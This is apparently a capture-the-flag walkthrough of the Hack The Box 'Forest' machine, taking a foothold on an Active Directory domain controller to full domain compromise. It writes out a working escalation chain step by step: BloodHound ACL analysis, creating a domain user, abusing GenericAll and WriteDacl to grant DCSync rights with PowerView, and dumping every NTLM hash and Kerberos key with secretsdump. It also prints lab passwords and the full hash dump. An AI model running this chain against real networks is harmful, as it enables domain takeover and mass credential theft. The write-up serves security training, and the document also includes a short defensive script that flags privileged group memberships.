Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> hostname
FOREST

Getting the user flag,

*Evil-WinRM* PS C:\Users\svc-alfresco> dir


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/26/2022  11:23 PM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> more user.txt
<USER FLAG>

Privilege Enumeration

Let's enumerate the current privileges of the user,

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                  Alias            S-1-5-32-548                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts                 Group            S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts                       Group            S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\> 
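
The group list above is the kind of output a reviewer should read for built-in alias SIDs rather than for names alone, because the S-1-5-32-xxx aliases are fixed across every domain. The following Python is an added example, not part of the original write-up: it parses a trimmed copy of the whoami /groups table shown above and reports any membership in a built-in group that carries elevated rights (Administrators, Account Operators, Server Operators, Print Operators, Backup Operators, using Microsoft's well-known SID values), which is what an account review of a service account should flag.

```python
"""Spot privileged built-in group memberships in `whoami /groups` output.

Added example, not from the original write-up: parses the group table
and reports any built-in group that should never hold an ordinary
service account. The table below is a trimmed copy of the output above.
"""

import re

# Well-known alias SIDs (values from Microsoft's well-known SID list).
PRIVILEGED_ALIASES = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}

WHOAMI_GROUPS = """\
Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\\Account Operators                  Alias            S-1-5-32-548                                  Mandatory group, Enabled by default, Enabled group
HTB\\Service Accounts                       Group            S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Mandatory Level     Label            S-1-16-8192
"""

# One table row: name, two or more spaces, the type column, the SID.
_ROW = re.compile(
    r"^(?P<name>.+?)\s{2,}(?P<type>Well-known group|Alias|Group|Label)\s+(?P<sid>S-1-[0-9-]+)"
)


def parse_groups(text):
    """Return a list of (group name, SID) pairs from whoami /groups output."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            rows.append((m.group("name").strip(), m.group("sid")))
    return rows


def privileged_memberships(text):
    """Return (group name, well-known alias) for each privileged built-in group."""
    return [(name, PRIVILEGED_ALIASES[sid])
            for name, sid in parse_groups(text)
            if sid in PRIVILEGED_ALIASES]


if __name__ == "__main__":
    for name, alias in privileged_memberships(WHOAMI_GROUPS):
        print(f"token holds {name} ({alias}): review why a service account is here")
```

Run on the sample it reports only BUILTIN\Account Operators; Remote Management Users (S-1-5-32-580) explains the WinRM access but is deliberately not on the list, since it grants a logon path rather than administrative rights over directory objects.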

Now let's run PowerUp.ps1 to check for any possible privilege escalation,

Transferring files via SMB

┌──(kaliaidenpearce369)-[~]
└─$ locate PowerUp.ps1                                                          
/usr/lib/python3/dist-packages/cme/data/powersploit/Privesc/PowerUp.ps1
/usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1
/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1 .
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ mkdir SMBShare   
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ cp PowerUp.ps1  SMBShare/

┌──(kaliaidenpearce369)-[~]
└─$ impacket-smbserver MONISH SMBShare 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

...

Copying our script to a writable location on the target,

*Evil-WinRM* PS C:\Users\svc-alfresco> copy \\10.10.14.4\MONISH\PowerUp.ps1 .
*Evil-WinRM* PS C:\Users\svc-alfresco> ls


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        3/27/2022   1:18 AM         563259 PowerUp.ps1

Running PowerUp.ps1 turned out to be useless here; it failed with privilege and WMI errors

Running SharpHound

Let's gather information with SharpHound and load the ingestor's output into BloodHound to analyse the shortest path to Domain Admin

Copying the ingestor to the target machine and running it,

*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe --collectionmethods All --domain htb.local --ldapUsername svc-alfresco --ldappassword s3rvice
2022-03-27T05:16:37.0031421-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:37.0656410-07:00|INFORMATION|Initializing SharpHound at 5:16 AM on 3/27/2022
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Loaded cache with stats: 120 ID to type mappings.
 120 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:40.0500234-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-03-27T05:16:40.3000250-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-03-27T05:16:40.3000250-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-03-27T05:17:10.7534462-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 42 MB RAM
2022-03-27T05:17:24.6751174-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2022-03-27T05:17:24.7064451-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 46 MB RAM
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Enumeration finished in 00:00:44.8591855
2022-03-27T05:17:25.0033515-07:00|INFORMATION|SharpHound Enumeration Completed at 5:17 AM on 3/27/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco> ls


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        3/27/2022   5:17 AM          17775 20220327051724_BloodHound.zip
-a----        3/27/2022   5:17 AM          19811 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----        3/27/2022   1:18 AM         563259 PowerUp.ps1
-a----        3/27/2022   3:51 AM         906752 SharpHound.exe

Let's copy the ingestor's output to our local machine,

*Evil-WinRM* PS C:\Users\svc-alfresco> copy 20220327051724_BloodHound.zip \\10.10.14.4\MONISH\

Now, analysing the BloodHound output,

These are the components shown on the home page; let's find the Domain Admins,

Let's analyse the shortest path from our owned principal to the Administrator of this domain,

Note that even though we can PS-Remote to the machine, we could not dump hashes with mimikatz because of a compatibility issue

Here, Service Accounts is a member of Privileged IT Accounts,

and Privileged IT Accounts is in turn a member of Remote Management Users and Account Operators

Using Remote Management Users, we can add users to enable PS-Remoting

And we also have the rights of Account Operators

As the graph shows, the shortest path to Domain Admins can also be reached through the WriteDacl ACL of Exchange Windows Permissions

And Account Operators has a GenericAll ACL over Exchange Windows Permissions

Privilege Escalation

We are already a member of the required groups,

*Evil-WinRM* PS C:\Users\svc-alfresco> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                  Alias            S-1-5-32-548                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts                 Group            S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts                       Group            S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\svc-alfresco> 

Since we are already a member of the required groups, we just need to use the GenericAll right to add a new user to Exchange Windows Permissions,

Creating a new user in the domain

*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain

User accounts for \\

-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           Guest                    HealthMailbox0659cc1
HealthMailbox670628e     HealthMailbox6ded678     HealthMailbox7108a4e
HealthMailbox83d6781     HealthMailbox968e74d     HealthMailboxb01ac64
HealthMailboxc0a90c9     HealthMailboxc3d7722     HealthMailboxfc9daad
HealthMailboxfd87238     krbtgt                   lucinda
mark                     santi                    sebastien
SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb     SM_2c8eef0a09b545acb
SM_681f53d4942840e18     SM_75a538d3025e4db9a     SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b     SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco> net user aidenpearce369 C@ntH4ckM3 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain

User accounts for \\

-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            aidenpearce369
andy                     DefaultAccount           Guest
HealthMailbox0659cc1     HealthMailbox670628e     HealthMailbox6ded678
HealthMailbox7108a4e     HealthMailbox83d6781     HealthMailbox968e74d
HealthMailboxb01ac64     HealthMailboxc0a90c9     HealthMailboxc3d7722
HealthMailboxfc9daad     HealthMailboxfd87238     krbtgt
lucinda                  mark                     santi
sebastien                SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb     SM_681f53d4942840e18     SM_75a538d3025e4db9a
SM_7c96b981967141ebb     SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b     svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco> 

Now, using the GenericAll right, we add our new user to the target group,

*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name     Exchange Windows Permissions
Comment        This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.

Members

-------------------------------------------------------------------------------
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions" /add aidenpearce369
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name     Exchange Windows Permissions
Comment        This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.

Members

-------------------------------------------------------------------------------
aidenpearce369
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> 

Adding our new user to Remote Management Users to enable PS-Remoting access,

*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
Privileged IT Accounts
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users" /add aidenpearce369
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
aidenpearce369
Privileged IT Accounts
The command completed successfully.

Switching to our new user,

┌──(kaliaidenpearce369)-[~/SMBShare]
└─$ evil-winrm -u aidenpearce369 -p C@ntH4ckM3 -i 10.10.10.161

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami
htb\aidenpearce369
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> hostname
FOREST

Let's use the WriteDacl ACL to grant DCSync rights to our new user,

Crafting the credential object for our new user,

*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> cd ..
*Evil-WinRM* PS C:\Users\aidenpearce369> $pass = convertto-securestring 'C@ntH4ckM3' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\aidenpearce369> $cred = New-Object System.Management.Automation.PSCredential ('HTB\aidenpearce369', $pass)

We need PowerView to write the DCSync ACL,

*Evil-WinRM* PS C:\Users\aidenpearce369> copy \\10.10.14.4\MONISH\PowerView.ps1 .
*Evil-WinRM* PS C:\Users\aidenpearce369> ls


    Directory: C:\Users\aidenpearce369


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        7/16/2016   6:18 AM                Desktop
d-r---        3/27/2022   8:05 AM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        3/27/2022   5:33 AM         770279 PowerView.ps1


*Evil-WinRM* PS C:\Users\aidenpearce369> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\aidenpearce369> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity aidenpearce369 -Rights DCSync

The DCSync privilege is now added to our new user, so we can dump all domain hashes with a DCSync attack

We can do that remotely using impacket-secretsdump, or locally on the target machine using mimikatz

Now let's dump the secrets using the DCSync permission of our new user,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-secretsdump aidenpearce369:C@ntH4ckM3@10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
aidenpearce369:9602:aad3b435b51404eeaad3b435b51404ee:0cb69e78807bb0bce38103060a3e4628:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:f6bec6f0744f874b2347f59f9267b449:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
aidenpearce369:aes256-cts-hmac-sha1-96:f7eafd55f28a0041db1cec4dfa3c620749c4ebf92a5da4edc49ada8a89b9fed1
aidenpearce369:aes128-cts-hmac-sha1-96:161f1c6ca692ea2a4e06779933a50770
aidenpearce369:des-cbc-md5:07fd8615a7c498b0
FOREST$:aes256-cts-hmac-sha1-96:9314a457b8b3f34e9b5ec2ffc39329c3ff00dd3514a1ed5c6cdf445882946517
FOREST$:aes128-cts-hmac-sha1-96:55394fdffa1beff12e98abe8ccec8e3d
